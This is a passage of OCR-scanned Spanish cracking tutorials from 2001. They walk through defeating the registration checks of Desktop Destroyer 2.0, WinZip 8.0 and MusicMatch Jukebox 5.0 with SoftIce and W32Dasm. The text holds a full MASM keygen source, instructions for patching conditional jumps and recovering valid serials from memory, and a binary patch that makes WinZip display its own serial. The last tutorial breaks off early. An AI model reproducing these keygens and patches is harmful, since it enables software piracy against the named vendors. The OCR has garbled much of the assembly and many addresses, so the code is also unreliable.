caso, el trozo de número correcto está situado entre las posiciones 68F4ED y 68F4F4. Vamos a pillar al programa 
cuando escribe el número, mediante bpr 68f4ed 68£4f4 w. Eliminamos o desactivamos mediante be o bd, cualquier 
otro breakpoint que tengamos, introducimos la instrucción d 68f4ed para vigilar que es lo que se escribe en esa 
posición y volvemos a empezar desde el principio el proceso, pulsando la tecla de registro, y vemos que en: 


:0040BC44 8802 mov byte ptr [edx], al 


se escriben "X" en las posiciones que más adelante van a ser ocupadas por las cifras del número. Continuamos con 
FS: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00408BBF (C) 


:00408BA7 33C0 xor eax, eax 

:00408BA9 BFOA000000 mov edi, 0000000A 

:00408BAE 8A0429 mov al, byte ptr [ecx+ebp] 
:00408BB1 99 cda 

:00408BB2 F7FF idiv edi 

:00408BB4 80C230 add dl, 30 

:00408BB7 88540E09 mov byte ptr [esit+ecx+09], dl 


Llegamos a este punto. Vemos que el contenido de ECX+EBP se divide por 10 (en EDI) y que al resto (en EDX) se 
le suma 48 (30h) para convertirlo en el código ASCII del número obtenido. 


:00408BBB 41 inc ecx 
:00408BBC 83F908 cmp ecx, 00000008 
:00408BBF 72E6 jb 00408BA7 


Se repite el bucle ocho veces para obtener las ocho cifras importantes del serial. Nueva marcha atrás. Para ver 
cuando se escribe en la posición ECX+EBP (en mi caso: 810E70) introduciremos la instrucción bpr 810E70 
S$10E77 w y volveremos a empezar el proceso. Vigilamos como hemos hecho antes lo que sucede en esa dirección y 
al detenerse el Softlce en: 


:00408A43 F3 repz 


vemos que se escriben ceros sobre esas posiciones de memoria. Continuamos con FS y vemos que a partir de: 


:00408A62 F3 repz 

:00408A63 A5 movsd 

:00408A64 8BC8 mov ecx, eax 
:00408A66 33C0 xor eax, eax 
:00408A68 83E103 and ecx, 00000003 
:00408A6B F3 repz 


empieza a escribir la cadena "Desktop Destroyer" y justo a continuación, nuestro nombre (en este caso: CaoS 
ReptantE) y nuestra dirección de e-mail (en este caso: caos_reptante hotmail.com). FS nuevamente: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00408AD9 (C) 


:00408ACA 8A48FF mov cl, byte ptr [eax-01] 
:00408ACD 8A10 mov dl, byte ptr [eax] 
:00408ACF 02D1 add dl, cl 

:00408AD1 8810 mov byte ptr [eax], dl 


Llegamos aquí y miramos lo que está haciendo el programa. 


:00408AD3 40 inc eax 

:00408AD4 8D1407 lea edx, dword ptr [edit+eax] 
:00408AD7 3BD6 cmp edx, esi 

:00408AD9 72EF jb 00408ACA 


Y casi a continuación: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00408AEF (C) 


:00408AE2 8A442B01 mov al, byte ptr [ebx+ebp+01] 
:00408AE6 8A0C2B mov cl, byte ptr [ebx+ebp] 
:00408AE9 02C8 add cl, al 

:00408AEB 880C2B mov byte ptr [ebx+ebpl, cl 
:00408AEE 4B dec ebx 

:00408AEF 75F1 jne 00408AE2 


Suma el código ASCU de la "D" (44h) y lo suma con el de la "e" (65h) y el resultado (A9h) lo pone donde estaba la 
"e". A continuación, suma A9 con el código de la "s" (73h) y el resultado (sería 11C pero en DL sólo cabe 1C) lo 
pone donde estaba la "s". Y así hasta que se acaba la cadena de texto formada por "Desktop Destroyer" + nuestro 
nombre + la dirección de e-mail. Posteriormente, este proceso se repite, pero a la inversa, es decir que empieza por el 
último número y termina en el primero (en este caso: A9h, al 44h no llega) Así pues, con los datos que hemos 


puesto, los ocho primeros números después del primer pase son: 
44 A9 1C 87 FB 6A DA FA 


Y después del segundo: 

44 EE 45 29 A2 A7 3D 63 

Tened en cuenta que se suman DL y CL, y luego CL y AL, lo que significa que si la suma es mayor de dos cifras, la 
de mayor significación, se pierde. 


Ahora, después de obtener los números que como hemos visto más arriba se situaban en ECX+EBP, viene lo de 
dividir por Ah y sumarle 30h al resto para obtener el código ASCII. El resultado es: 88912719, por lo que el serial 
correcto será: xxxxxxxx88912719x, siendo x un número cualquiera del 0 al 9. 


Una vez descubierto "el pastel", vamos a programar el keygen con la inestimable ayuda del Masm. Para empezar, ahí 
va el fichero de recursos rsrc.rc: 


finclude "Amasm32Xincludelresource.h" 


tdefine IDD_DIALOG 1000 
tdefine IDC_NAME 1001 
tdefine IDC_MAIL 1002 
tdefine IDC_SERIAL 1003 
tdefine IDC_GEN 1004 
tdefine IDC_EXIT 1005 
define IDC_STATIC =1 


keygen ICON keygen.ico 


IDD_DIALOG DIALOG 100,100,115,65 


STYLE WS_CAPTION | DS_CENTER | WS_SYSMENU |WS_MINIMIZEBOX 


CAPTION "Desktop Destroyer 2.0" 


FONT 10, "MS Sans Serif" 


BEGIN 
TEX "Nombre", IDC_STATIC,8,8,28,10 
¿TEX "E-mail", IDC_STATIC,8,22,28,10 
LTEX "Serial", IDC_STATIC,8,36,28,10 
EDI EX IDC_NAME,36,6,71,10,ES_AUTOHSCROLL | ES_CENTER 
EDITTEX IDC_MAIL,36,20,71,10,ES_AUTOHSCROLL | ES_CENTER 
EDI EX IDC_SERIAL,36,34,71,10,ES_READONLY | ES_ CENTER 
PUSHBUTTON "Generar", IDC_GEN, 8,49,40,12 
PUSHBUTTON "Terminar", IDC_EXIT,67,49,40,12 

END 


Hemos definido la ventana, los recuadros de texto, los botones, el icono, etc. En anteriores trabajos, he explicado los 
fundamentos del programa con más detalle o he indicado donde obtener información de primera mano sobre este 
tema. Si necesitáis alguna aclaración, dadme un toque :0) Ahora vamos a ver el fichero ddestroyer.asm del que 


sólo comentaré los aspectos propios de este programa concreto. 


.386 
.model flat,stdcall 
option casemap:none 


include c:imasm32Xincludewindows.inc 
include c:imasm32Xincludeluser32.inc 
include c:imasm32Xincludelkernel32.inc 
includelib c:imasm321libluser32.1lib 
includelib c:imasm3211liblkernel32.lib 


¿const 

IDD_DIALOG EQU 1000 
IDC_NAME EQU 1001 
IDC_MATL EQU 1002 


IDC_SERIAL EQU 1003 
IDC_GEN EQU 1004 
IDC_EXIT EQU 1005 


DlgFunc PROTO : DWORD, :DWORD, :DWORD, : DWORD 


Operacion PROTO 


. data 

nombre db 64 dup(0),0 

mail db 32 dup(0),0 

cadena db 110 dup(0),0 

serial db "190072001xxxxxxxx0",0 


Las cifras que he puesto aquí no tienen ningún valor, las "x" se substituirán por las cifras que generaremos. 


Icono db "keygen",0 

Iconimage db "keygen",0 

texto db "Desktop Destroyer",0 
minombre db "CaoS ReptantE",0 

mimail db "caos_reptanteflhotmail.com",0 
hInstance dd 0 

hIcon da 0 

hWnd dd 0 

.code 

start: 


invoke GetModuleHandle,NULL 

mov hInstance,eax 

invoke DialogBoxParam,hInstance, IDD_DIALOG, NULL, addr DlgFunc, NULL 
invoke ExitProcess, NULL 


DlgFunc proc hD1g:DWORD, uUMsg:DWORD, wParam:DWORD, 1lParam: DWORD 


.1f uMsg==WM_INITDIALOG 
mov eax,hDlg 
mov hWnd, eax 
invoke LoadIcon,hInstance,addr Icono 
mov hlIcon,eax 
invoke SendMessage, hDlg, WM_SETICON,1,hIcon 
invoke SetDlglItemText,hDlg,IDC_NAME,ADDR minombre 
invoke SetDlglItemText,hDlg,IDC_MATL,ADDR mimail 
.elseif uMsg==WM_CLOSE 
invoke EndDialog,hDlg,NULL 
.elseif uMsg==WM_COMMAND 
mov eax,wParam 
mov edx,eax 
shr edx,16 
.1f dx==BN_CLICKED 
.«1f ax==IDC_EXIT 
invoke SendMessage,hDlg,WM_CLOSE, 0,0 
.elseif ax==IDC_GEN 
invoke GetDlglItemText,hDlg,IDC_NAME,ADDR nombre, 64 
invoke GetDlglItemText,hDlg,IDC_MATL,ADDR mail, 32 
invoke l1lstrlen,ADDR nombre 
invoke Operacion 
invoke SetDlgltemText,hDlg,IDC_SERIAL,ADDR serial 
ret 
.endif 
.endif 
.endif 
Pet 


Hemos creado la ventana y controlamos en primer lugar si el programa se cierra desde la parte superior derecha, o si 
se pulsa un botón. En este caso si el botón es el de salir, pues adiós... y si es el de generar el serial, vamos a 
operacion, y al regreso, colocamos el serial obtenido en la ventana correspondiente. 


DlgFunc endp 


Operacion proc 
pushad 


Por si acaso... 


xXOr eax, eax 
mov ebx, offset cadena 
mov ecx, offset texto 


buclel: mov al, byte ptr [ecx] 

«if al == 0 
jmp seguirl 

.endif 
mov byte ptr [ebx], al 
inc ebx 
inc ecx 
jmp buclel 


El bucle 1 escribe en el espacio reservado a la variable cadena, el texto "Desktop Destroyer". 


seguir1l: mov ecx, offset nombre 
bucle2: mov al, byte ptr [ecx] 
.1f al == 
jmp seguir2 
.endif 
mov byte ptr [ebx], al 
inc ebx 
inc ecx 
jmp bucle2 


El bucle 2 escribe a continuación del texto anterior, nuestro nombre. 


seguir2: mov ecx, offset mail 


bucle3: mov al, byte ptr [ecx] 
mov byte ptr [ebx], al 
.1f al == 

jmp seguir3 

.endif 
inc ebx 
inc ecx 
jmp bucle3 


El bucle 3 escribe a continuación, nuestra dirección de e-mail. Fijaos que la comprobación de que el caracter es cero 
se hace despues de haberlo escrito, a diferencia de los bucles anteriores. Esto es para que la cadena "suma" termine 
en cero. 


seguir3: mov ebx, offset cadena 
mov edi, ebx 


buclel4: mov al, byte ptr [ebx] 
inc ebx 
mov cl, byte ptr [ebx] 
.1f cl == 0 
dec ebx 
jmp bucles 
.endif 
add al, cl 


mov byte ptr [ebx], al 


jmp bucle4 


El bucle 4 suma el código ASCI de la primera letra de la cadena con el de la segunda como hemos visto 
anteriormente, continuando el proceso hasta el final de la cadena de texto. 


bucle5: mov al, byte ptr [ebx] 
dec ebx 
mov cl, byte ptr [ebx] 
push ebx 
sub ebx, edi 
.1f ebx == 
pop ebx 
jmp seguir 
.endif 
pop ebx 
add al, cl 
mov byte ptr [ebx], al 
jmp bucles 


El bucle 5 hace lo mismo, pero desde el final al principio. Por cierto, no llega a modificar el primer numero que es el 
44h correspondiente a la "D", por lo que, como veremos, la primera cifra útil es siempre un ocho. 


seguir: mov ebx, offset cadena 
mov ebp, offset serial 
add ebp, 9 


Suma nueve para empezar por la novena cifra. 


mov ecx, 10 
mov edi, ebx 
bucle6: xor edx, edx 
mov al, byte ptr [ebx]l 
div ecx 
add dl, 48 
mov byte ptr [ebp], dl 
inc ebx 
inc ebp 
sbb ebx, edi 
.1f ebx== 
jmp final 
.endif 
add ebx, edi 
jmp bucle6 


El bucle 6 se repite ocho veces y divide los primeros números de la variable cadena (en EAX) por 10 (ECX) y le 
suma al resto (en EDX) 48 para convertirlo en el código ASCII del número, tal como hemos visto anteriormente que 
hacía el programa "víctima". Finalmente coloca el número resultante en el lugar que le corresponde en la variable 


serial. 


final: popad 
Let. 


Operacion endp 


end start 


Y eso es to... y eso es to... y eso es todo amigos. 


le 3 Desktop Destroyer 2.0 A E | 


Nombre | CaoS ReptantE 
E-mail Ícaos_reptante(3hotm 
Serial | 190072001889127190 


Terminar | 


Bueno, hemos llegado al final, ahora ya me puedo ir de vacaciones, pero no sin dejaros deberes para que los hagáis 
durante mi ausencia :0) En la misma página que hay este salvapantallas, hay otro mucho mejor (Liquid Desktop) con 
un sistema de protección similar, podéis practicar con él y, si lo hacéis, veréis que merece la pena registraros 
legalmente :0) En cualquier caso, si no queréis despertaros por la noche oyendo los gritos de los hijos de los 
programadores, pagad por los programas que utilicéis ;0) 


Ya sólo me queda saludar a todos los code crackers en general, y especialmente a Act MagO, DeK_Oin y el 
Pr*fEsOr X. También muy cordialmente a Karpoff. 


Si queréis aclaraciones sobre mis tutos, dadme un toque, mi dirección de e-mail es: caos_reptante O hotmail.com 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 2001 


¡Programa : 


| Winzip 8.0 


PROTECCION: 


Name/Serial. 


Descripcion: Clásico compresor/descompresor de archivos. 
Dificultad: Novato. 


DOWNLOAD : 


http://www.winzip.com 


Herramientas: SoftIce, W32Dasm, Editor Hexadecimal. 


CRACKER : CKENER FECHA: 21/04/2001 


INTRODUCCION 


Hey !! Hola a todos, este ha sido el primer programa que crackeo, en realidad es muy sencillo y por ello 
vamos a hacer un ejercicio extra... ya verán de que se trata. Bueno creo que esta demás hablar sobre este 


clásico compresor/descompresor de archivos para Windows, así que empecemos... 


AL ATAKE 


Previamente con el Winzip instalado, veamos que nos encontramos por ahí. Nos aparece una nag que nos dice que estamos 
utilizando una versión no registrada del programa y por lo tanto solo podemos usarla durante 21 días, después de ello debemos 
pagar la pequeña cantidad de $29 dólares (como si nos lloviera dinero) para obtener nuestro + de registro... sí claro! 

Vemos que podemos registrarnos desde ese nag o bien desde el menú Help...Enter Registration Code... , vemos también que en la 
barra de titulo nos aparece un desagradable letrero como este: WinZip (Unregistered). Y eso no es todo, cuando creamos los self- 
extract se molestan en decir que fue hecho con una versión no registrada. Valla que tenemos razones para jugar un rato. 


Vallamos a cualquiera de las ventanas para registrarnos e introduzcamos un nombre: CKENER y un codigo falso: 787878, 
hacemos click en OK y... SORPRISE !!! nos aparece un mensaje que dice: Incomplete or incorrect information. 
Desensamblemos el ejecutable con W32Dasm y busquemos a través de las String References: 


String Resource ID=00652: 
String Resource ID=00653: 
String Resource ID=00654: 
String Resource ID=00655: 
String Resource ID=00656: 


"Could not find %:s" 

"WinZip Add-Ons cannot be removed while WinZip is running. Cl" 
"Incomplete or incorrect information" 

"For full access to WinZip's shell interface, WinZip must be " 
"However, a different copy of WinZip in a different folder or" 


Con un doble click nos manda a un lugar como este: 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
|:00407FAA(O), :00407FB3(C), :00407FBC(C) 


| 
:00408005 E89C020000 call 004082A6 


* Possible Reference to String Resource ID=00654: "Incomplete or incorrect information" 


:0040800A 688E020000 push 0000028E 

:0040800F EsD9750300 call 0043FS5ED 

:00408014 50 push eax 

:00408015 53 push ebx 

:00408016 6A3D push 0000003D 

:00408018 E808800200 call 00430025 

:0040801D 83C410 add esp, 00000010 

:00408020 FF05F87A4800 inc dword ptr [00487AF8] 


Vemos en la parte superior que nos han mandado hasta aquí desde tres lugares diferentes: OO4O7FAA, 00407FB3, 00407FBC, y 
también que los saltos están muy próximos entre sí. Vallamos con Goto Code Location hasta la primera dirección de ellas y allí 


encontraremos los tres saltos. 


Reference To: USER32.GetDlgltemTextA, Ord:0104h 


| 
:00407F8F FF1528744700 Call dword ptr [00477428] 


:00407FE95 56 push esi 
:00407F96 EsFE780300 call 0043F89A 
:00407F9B 56 push esi 
:00407F9C E822790300 call 0043F8C3 


:00407FA1 803D78CD480000 cmp byte ptr [0048CD78], 00 


:00407FAS8 59 pop ecx 
:00407FA9 59 pop ecx 
:00407FAA 7459 je 00408005 


:00407FAC 803DA4CD480000 cmp byte ptr [0048CDA4], 00 


:00407FB3 7450 je 00408005 
:00407FB5 ES1BFAFFFF call 004079D5 
:00407FBA 85CO0 test eax, eax 
:00407FBC 7447 je 00408005 
:00407FBE 57 push edi 


Observemos que los tres je nos mandan a la dirección 004080053 (directo al mensaje de error) y evitan que lleguemos a la zona de 


victoria. 


Reiniciemos la maquina (si es que no tenemos cargado el Soft-Ice), abrimos el Winzip y volvemos a llenar el cuadro de 
registracion con los datos antes mencionados, antes de darle OK, presionemos Ctrl+D para poner un BPX HMEMCPY (para que el 
Soft-Ice salte cuando lea nuestros datos), FS para salir de Soft-Ice y damos OK .... BOOOM .... de nuevo en Soft-Ice, presionemos 
F12, F12, F12.... hasta llegar al código de Winzip (ver línea verde abajo). Y vemos algo parecido a esto: 


:00407F6D FF1528744700 Call dword ptr [00477428] < 


:00407F73 57 push edi<------- Aparecemos Aqui 
:00407F74 E821790300 call 0043F89A 
:00407F79 57 push edi 

:00407F7A Es44790300 call 0043F8C3 
:00407F7F 59 pop ecx 

:00407F80 BEA4CD4800 mov esi, 0048CDA4 
:00407F85 59 pop ecx 

:00407F86 6AO0B push 0000000B 

:00407F88 56 push esi 

:00407F89 68810C0000 push 00000C81 
:00407F8E 53 push ebx 


:00407F8F FF1528744700 Call dword ptr [00477428]<- 


:00407F95 56 push esi 
:00407F96 EsFF780300 call 0043F89A 
:00407F9B 56 push esi 


o Recoge nuestro nombre 


aan Recoge Codigo Falso 


:00407F9C E822790300 call 0043F8C3 

:00407FA1 803D78CD480000 cmp byte ptr [0048CD78], 00 <------- Chega que hallamos escrito algo en el nombre, de lo contrario 
vamos a error. 

:00407FAS 59 pop ecx 

:00407FA9 59 pop ecx 

:00407FAA 7459 je 00408005 <------- Brinca a error 

:00407FAC 803DA4CD480000 cmp byte ptr [0048CDA4], 00 <------- Cheqa que hallamos escrito la clave, de lo contrario vamos a 
error. 

:00407FB3 7450 je 00408005 <------- Brinca a error 

:00407FB5 ES1BFAFFFF call 004079D5 <------- Dentro de este Call se genera y se compara el código real con nuestro 787878, si 
no son iguales eax sale con O, de lo contrario eax sale con 1. 

:00407FBA 85CO0 test eax, eax <------ Testea eax 

:00407FBC 7447 je 00408005 <------- Brinca a error si los codigos son diferentes. 

:00407FBE 57 push edi 


Ahora sabemos que lo que debemos evitar es el tercer salto, para lo cual tenemos que invertir el flujo del programa: 


0.- Cambiar el je por jne, en la barra de comandos de Soft-Ice tecleamos a 00407FBC [enter] y después escribimos ¡ne 00408005 
[enter] presionamos Esc para dejar de escribir código, un FS y .... BOOALA .... Ventana de Felicitaciones. 

1.- Lo NOPeamos, como en el paso anterior solo que ahora escribimos nop [enter] nop [enter], e igualmente nos dan las gracias por 
ser tan buenos. 

2.- O podemos anotar R FL Z para cambiar el sentido de la flag cero y.... ya saben lo que pasa. 


Pero volvemos a abrir el Winzip y sorpresa... no esta registrado, ¿Qué ha pasado?. 

Lo que paso es que los programadores agregaron una protección al inicio del programa para verificar si esta o no registrado con el 
código correspondiente a nuestro nombre que han guardado en el Registro de Windows. (No he averiguado si la proteccion del 
inicio es la misma que esta, si asi fuera podriamos hacer los cambios con un editor hexadecimal y siempre estariamos registrados 
con cualquier s/n.). 


EN BUSCA DEL SERIAL CORRECTO 

Bueno, volvamos a llenar el cuadro de registro con nuestros datos y pongamos el BPPX HMEMCPY para que el Soft-Ice salte 
cuando le demos OK. Presionemos unos cuantos F12 y otros cuantos F10 para llegar hasta la zona del Call maligno (Call 
004079D5), justo encima toquemos F8 para entrar en él, seamos observadores porque nos encontraremos con dos códigos validos. 


:004079D53 55 push ebp <------- Aparecemos aquí. 
:004079D6 8BEC mov ebp, esp 

:004079D8 81EC08020000 sub esp, 00000208 
:004079DE 53 push ebx 

:004079DF 56 push esi 


F10, F10, F10, F1O, F10, FLO, FlO...... hata llegar a esta zona. 


:00407A8A 33C0 xor eax, eax 

:00407A8C E9B 1000000 ¡mp 00407B42 

:00407A91 8D85COFEFFFF lea eax, dword ptr [ebp-0140] 

:00407A97 50 push eax 

:00407A98 57 push edi 

:00407A99 E8SA9000000 call 00407B47 <------- Genera nuestro ler. codigo y lo pone en [ebp-0140]. 


Con un D ebp-0140 Soft-Ice nos muestra un hermoso numero de 8 cifras: XXXXXXXX. 


:00407A9E BEA4CD4800 mov esi, 0048CDA4<------- Mueve nuestro 787878 a esi. 

:00407AA3 8D85COFEFFFF lea eax, dword ptr [ebp-0140] <------- Mueve el ler. codigo a eax. 

:00407AA9 56 push esi <------- Empuja 787878 la pila. 

:00407AAA 50 push eax <------- Empuja el ler. codigo a la pila. 

:00407AAB E820180600 call 004692D0 <------- Creo que hace comparaciones del ler. codigo y nuestro 787878 
:00407ABO 83C410 add esp, 00000010 

:00407AB3 F7D8 neg eax 

:00407AB5 1BCO0 sbb eax, eax 

:00407AB7 40 inc eax 


:00407AB8 A3DC9F4800 mov dword ptr [00489FDC], eax 

:00407ABD 7368 ¡ne 00407B27 

:00407ABF 8D85COFEFFFF lea eax, dword ptr [ebp-0140] 

:00407ACS5 50 push eax 

:00407AC6 57 push edi 

:00407AC7 E818010000 call 00407BE4 <------- Genera nuestro 2do. codigo y lo pone en [ebp-0140]. 


Con otro D ebp-0140 Soft-Ice nos muestra otro numero parecido al anteior: XXXXXXXX. 


:00407ACC 8D85COFEFFFF lea eax, dword ptr [ebp-0140] <------- Mueve el 2do. codigo a eax. 
:00407AD2 56 push esi <------- Empuja el 787878 a la pila. 
:00407AD3 50 push eax <------- Empuja el 2do. codigo a la pila. 


Presionamos FS para salir del Soft-Ice y volvemos a llenar la ventana de registro con nuestro nombre y cualquiera de los dos 
códigos que nos han proporcionado, y.... aparece la ventana de felicitaciones, le damos OK, cerramos el Winzip, lo volvemos a 
abrir y ya no nos aparece la molesta nag del inicio ni ningún mensaje molesto. LO HEMOS LOGRADO. 

Con esto ha sido mas que suficiente para poder conseguir un código correcto (dos en realidad), creo que el primer código es para 
alguna versión antigua del Winzip y el segundo es exclusivamente para la versión 8.0 o viceversa o que se yo :-). 


EJERCICIO EXTRA 
¿Qué? ¿Esto ha sido todo? ¿Ya se ha cansado Winzip?... ok., si Winzip ya no quiere jugar con nosotros, juguemos nosotros con 
Winzip. 


¿Pero que a que podremos jugar?... pensemos... ¡No, eso no!... ¡No, tampoco eso!... ¡Ya!... ¿Porque no hacer un KeyGenerator?, oh 
si, eso si que es interesante pero, ¿Como le vamos a hacer? 

Bueno, sabemos que cuando genera alguno de nuestros serials los pone en alguna dirección de memoria, y que si no le damos el 
serial correcto nos muestra una ventana con un mensaje que por supuesto también salió de la memoria, ahora ¿Que pasaría si en 
lugar de ir a la posición de memoria donde se encuentra el mensaje de error fuera a donde esta uno de nuestros serials correcto? oh 
si, ya veo la cara de felicidad en sus rostros. 


Ok, empecemos esto que se me esta haciendo agua la boca... He escogido al segundo serial como el afortunado (ya verán porque) 
para aparecer en nuestra ventanita. Entonces tenemos que cuando se genera este numero el Call 00407BE4 lo pone en la dirección 
[ebp-0140] y que el mensaje de error aparece en un lugar así: 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
|:00407FAA(O), :00407FB3(C), :00407FBC(C) 


| 
:00408005 E89C020000 call 004082A6 


* Possible Reference to String Resource ID=00654: "Incomplete or incorrect information" 
| 

:0040800A 688E020000 push 0000028E 

:0040800F E8D9750300 call 0043F5ED 

:00408014 50 push eax <------- Algo se pushea aqui. 

:00408015 53 push ebx <------- Algo se pushea aqui. 

:00408016 6A3D push 0000003D <------- Y aquí tambien. 

:00408018 ES08800200 call 00430025 <------- Este call es el responsable del mensaje de error. 
:0040801D 83C410 add esp, 00000010 

:00408020 FFO05F87A4800 inc dword ptr [00487AF8] 

:00408026 833DF87A480003 cmp dword ptr [00487AF8], 00000003 

:0040802D 0F85F9000000 jne 0040812C 

:00408033 6A00 push 00000000 


Si miramos a que es lo que apunta el registro EAX en :00408014, vemos que esta el texto: Incomplete or incorrect information. Y 
es ahí donde debemos pushear nuestro serial y para ello debemos entrar en el Call 004079D5 antes mencionado y mantener 
presionado EFlO0 hasta llegar a aquí: 


:00407B27 682C010000 push 0000012C 
:00407B2C 8D85COFEFFFF lea eax, [ebp-0140] <------- Mueve lo que apunta [ebp-0140] a eax. 
:00407B32 6A00 push 00000000 


:00407B34 50 push eax 

:00407B35 E8D6000600 call 00467C10 <------- Este call borra de la memoria el serial. 

:00407B3A A1DC9F4800 mov eax, [00489FDC] <------- Mueve a eax un 00000000 que hace que brinquemos a error al salir del 
Call. 

:00407B3F 83C40C add esp, 0000000C 

:00407B42 5F pop edi 

:00407B43 5E pop esi 

:00407B44 5B pop ebx 

:00407B45 C9 leave 

:00407B46 C3 ret 


En esta zona vemos que un maldito Call borra de nuestra memoria el serial y que antes del el hay unos push y un lea eax..., aunque 
evitáramos el Call y también que eax valga cero, saldríamos del Call con un valor diferente de cero y no llegaríamos a la zona de 
error, lo cual no queremos. Entonces debemos utilizar otro registro que sea el que apunte a el serial para después pushearlo antes 
del mensaje, y si miramos los registros mientras presionamos F10 vemos que el único que no cambia antes de llegar al mensaje es 
ESI. Lo que debemos hacer entonces es mover la dirección de memoria a la cual apunta [ebp-0140] a esi y también evitar el Call 
que pone en ceros la memoria, nótese que debemos empezar a escribir nuestro código donde esta el primer push para que no haya 
desajustes en la pila. Y esto quedaría así: 


:00407B27 682C010000 push 0000012C 

:00407B2C 8D85COFEFFFF lea eax, [ebp-0140] 

:00407B32 8D85COFEFFFF lea esi, [ebp-0140] <------- Movemos la direccion de [ebp-0140] a esi. 
:00407B 34 B800000000 mov eax, 00000000 <------- Ponemos ceros en eax. 


:00407B35 90 nop <------- Llenamos lo espacios sobrantes con un nop. 

:00407B3A 90 nop <------- Llenamos lo espacios sobrantes con un nop. 

:00407B3F 83C40C add esp, 0000000C 

:00407B42 5F pop edi 

:00407B43 5F pop edi <------- Ponemos esto porque si lo dejamos como esta cambiaria el valor de esi. 
:00407B44 5B pop ebx 

:00407B45 C9 leave 

:00407B46 C3 ret 


y por ultimo: 


:0040800A 688E020000 push 0000028E 

:0040800F EsD9750300 call 0043F5ED 

:00408014 55 push esi <------- Pusheamos esi en lugar de eax. 
:00408015 53 push ebx 

:00408016 6A3D push 0000003D 

:00408018 ES08800200 call 00430025 

:0040801D 83C410 add esp, 00000010 


Cambiando todo esto podemos estar seguros de que el programa nos Pusheara todos los códigos que queramos durante esa sesión 
con el Winzip (hago la suposición de que sabes como cambiar esto con el SICE), pero aquí hay un "pero": no se nos ocurra hacer 
los cambios con un editor hexa porque no garantizo que funcione, si lo haces acuérdate de crear un Backup del programa y 
notificarme si te funciono... Ok. 


Quiero agradecer a todos los Crackers que han publicado sus textos, de los cuales me he apoyado para poder realizar este Crack, y 
por supuesto a la industria del Shareware que nos proporciona una gran variedad de la materia prima con la podemos pasar muy 
gratos momentos. 


Y por ultimo un saludo para todos compas de Monterrey :-). 


Sugerencias, comentarios, correcciones y demás a: ckener452(0 hotmail.com 


"Este tutorial es exclusivamente para uso educacional, el autor no se hace responsable por el mal uso que se le pueda dar." 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 2001 


Programa: | MusicMatch Jukebox 5.0 


PROTECCION: Serial, Opciones deshabilitadas. 

Descripcion: ¡Reproductor y Convertidor de Mp3. 

Dificultad: | Novato. 

DOWNLOAD: http: //www.nolosé.com 

Herramientas: [Soft Ice, W32Dasm 

CRACKER: | CKENER | FECHA: 28/04/2001 


INTRODUCCION 


Hola a todos, aquí estoy de nuevo con mi segundo tuto y se trata de MusicMatch Jukebox que creo que ya 
todos lo conocen y alguna vez lo han usado,el programa creo que no merece este escrito porque de todos los 
programas que he crackeado este es el más sencillo, pero quiero hablar sobre un detalle con el que nunca me 
había topado (la protección se encuentra en una dll.), espero que no se burlen de mi por haber escrito esto... 
Ok. 


AL ATAKE 


Antes de empezar a crackear familiaricémonos un poco con el programa, busquemos una canción de nuestro agrado como The Call 
of the Ktulu de Metallica (el mas puro del Heavy Metal) en nuestro flamante Disco Duro y escuchémosla, pasemos el mouse sobre 
los botones y observemos que cambian de color a un verde mallativo, todo parece ir bien en estos momentos pero si queremos pasar 
una canción de un CD a mp3 nos encontramos con que aparecen deshabilitadas las opciones de 128 y 160 kbps y la mejorcita que 
vemos es de 96 kbps, esto es lo que me caga de sobremanera, ya una vez molestos démosle una solución. 


Vemos un menú Register... Enter Key desde donde podemos atacar, también que solo nos pide la Key, introduzcamos cualquier 
cosa, después demos un click a OK y lo que estábamos esperando... una ventanita que dice ya saben que "The Upgrade Key is Not 
Valid. Please Try... bla, bla, bla". 


Ahora vallamos a desensamblarlo con W32Dasm a ver que nos encontramos, interroguemos a las String References para ver que es 
lo que callan, pero después de tanto buscar no encontramos la cadena del mensaje de error, ¿Qué podrá ser? ¿De donde ha salido ese 
mensaje?... utilicemos el ZenCracking... pensemos... ¿Qué acaso no dice MMSecurity en el titulo del mensaje? ¿Qué será eso?... 
Sabemos que el nombre del ejecutable es mmjb.exe ¿Acaso todos los archivos del MusicMatch tendrán el prefijo mm?... Sí, vemos 
en la carpeta del programa unos archivos como mm_tray.exe, mmtrace.exe, mmpurchase.exe, el mismo mmyjb.exe, etc, etc, Si vemos 
los archivos que están ocultos encontraremos varias dlls que empiezan con el prefijo mm y entre ellas MMSecurity, ¡ Esa debe ser la 
culpable ! (Cabe suponer que también podríamos haber llegado a la conclusión de que es MMSecurity.dll la que genera el mensaje 
de error simplemente traceando con SICE antes de que aparezca dicho mensaje observando la línea verde de abajo de la pantalla). 


Desensamblamos la DLL, vamos a las SR y tampoco encontramos la dichosa cadena, pero ahora veamos las exportaciones que 
proporciona esta DLL y vemos unas funciones que parecen clave: GetLatestKey, GetUpgradeKey, ManualUpgradeKey y 
SetUpgradeKey, sus nombres lo dicen todo. 


¿Pero que hace cada una? 

GetUpgradeKey: es la encargada de abrir la conexión a Internet y el explorador para registrarnos en línea, también nos pone una 
ventana donde nos muestra nuestro serial una vez ya registrados. 

ManualUpgradeKey: es la encargada de abrir el dialogo para introducir la Key que obtuvimos después de que nos hallan robado una 
buena cantidad de dinero de nuestra MasterCard ;-) 

SetUpgradeKey: es la hace las comparaciones y nos da el mensaje de error si no hemos acertado. 

GetLatestUpgradeKey: aun no lo averiguo. 


Ahora que ya sabemos como funciona el meollo dediquémonos a simplemente cambiarle las cosas al programa. Para ello pongamos 
un BPX GETWINDOWTEXTA después de llenar el cuadro de dialogo con cualquier cosa (CKENER) y hacemos click en OK, una 
vez salte SICE borremos el BreakPoint anterior y pongamos otro así BPX 67A020BO, que es la dirección donde empieza la función 
SetUpgradeKey y presionemos FS3 para llegar e esta zona: 


:67A020BO 55 push ebp >Aparecemos aquí. 
:67A020B1 8BEC mov ebp, esp 

:67A020B3 81ECACO000000 sub esp, O0ODOO0DAC 
:67A020B9 53 push ebx 

:67A020BA 56 push esi 

